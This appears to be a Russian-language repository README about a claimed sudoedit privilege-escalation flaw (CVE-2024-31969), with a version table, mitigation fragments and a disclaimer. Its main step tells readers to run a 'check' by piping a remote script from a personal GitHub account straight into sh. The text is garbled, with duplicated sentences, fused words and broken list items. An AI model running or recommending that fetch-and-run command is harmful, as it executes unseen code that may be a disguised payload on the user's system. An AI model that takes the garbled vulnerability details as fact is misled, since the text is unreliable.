
CVE-2024-31969 — это локальное повышение привилегий в sudo при использовании sudoedit.
CVE-2024-31969 – это уязвимость local privilege escalation в sudo при использовании команды sudoedit.
Эта уязвимость была введена в sudo 1.9.0 из-за некорректного способа, которым sudoedit проверяет переменные окружения пользователя и права собственности на файлы.
Недостаток, появившийся в sudo 1.9.0, в методе проверки
sudoeditпеременных окружения пользователей и прав собственности на файлы.
Эта уязвимость позволяет локальному пользователю с доступом sudoedit изменять произвольные файлы с правами root путем манипуляции переменными окружения, такими как SUDO_EDITOR, или с помощью символьных ссылок (symlink).
| Версия Sudo | Статус |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Уязвима |
| 1.9.15p5 и выше | ✅ Безопасна |
| 1.8.x (включая 1.8.23) | ❌ Не затронута |
Выполните следующую команду:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo до версии 1.9.15p5 или новее.sudoers, которые разрешают sudoedit для пользователей, не являющихся root.env_keep или env_reset в файле /etc/sudoers.Этот репозиторий создан в образовательных целях и для документации по безопасности систем.
Строго запрещено использовать эту информацию для незаконных действий или без письменного разрешения владельца системы.
Любые формы злоупотребления полностью находятся вне ответственности создателя.